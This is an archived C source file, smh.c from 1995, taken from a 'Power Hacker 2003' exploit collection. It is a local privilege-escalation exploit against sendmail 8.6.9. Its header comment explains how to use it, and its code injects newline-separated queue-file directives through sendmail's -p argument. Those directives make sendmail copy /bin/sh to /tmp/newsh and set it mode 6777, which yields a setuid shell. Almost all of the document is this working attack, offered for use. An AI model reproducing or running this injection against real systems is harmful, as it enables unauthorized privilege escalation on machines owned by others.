home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Power Hacker 2003
/
Power_Hacker_2003.iso
/
Exploit and vulnerability
/
hoobie
/
smh.c
< prev
next >
Wrap
C/C++ Source or Header
|
2001-11-06
|
1KB
|
40 lines
/* smh.c - Michael R. Widner - atreus (2/27/95)
* <widner@uchicago.edu> <atreus@primus.com>
* a quick hack to abuse sendmail 8.6.9 or whatever else is subject to this
* hole. It's really just a matter of passing newlines in arguments to
* sendmail and getting the stuff into the queue files. If we run this
* locally with -odq we are guaranteed that it will be queue, rather than
* processed immediately. Wait for the queue to get processed automatically
* or just run sendmail -q if you're impatient.
* usage: smh [ username [/path/to/sendmail]]
* It's worth noting that this is generally only good for getting bin.
* sendmail still wants to process the sendmail.cf file, which contains
* Ou1 and Og1 most of the time, limiting you to bin access. Is there
* a way around this?
* cc -o smh smh.c should do the trick. This just creates a bin owned
* mode 6777 copy of /bin/sh in /tmp called /tmp/newsh. Note that on some
* systems this is pretty much worthless, but you're smart enough to know
* which systems those are. Aren't you?
*/
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
main(argc, argv)
int argc;
char **argv;
{
execlp(argv[2] ? argv[2] : "sendmail","sendmail","-odq","-p",
"ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, P=/bin/sh, F=lsDFMeu,
A=sh -c $u\nR<\"|/bin/cp /bin/sh /tmp/newsh\">\nR<\"|/bin/chmod 6777 /tmp/newsh\">\n$rascii ",
argv[1] ? argv[1] : "atreus",0);
}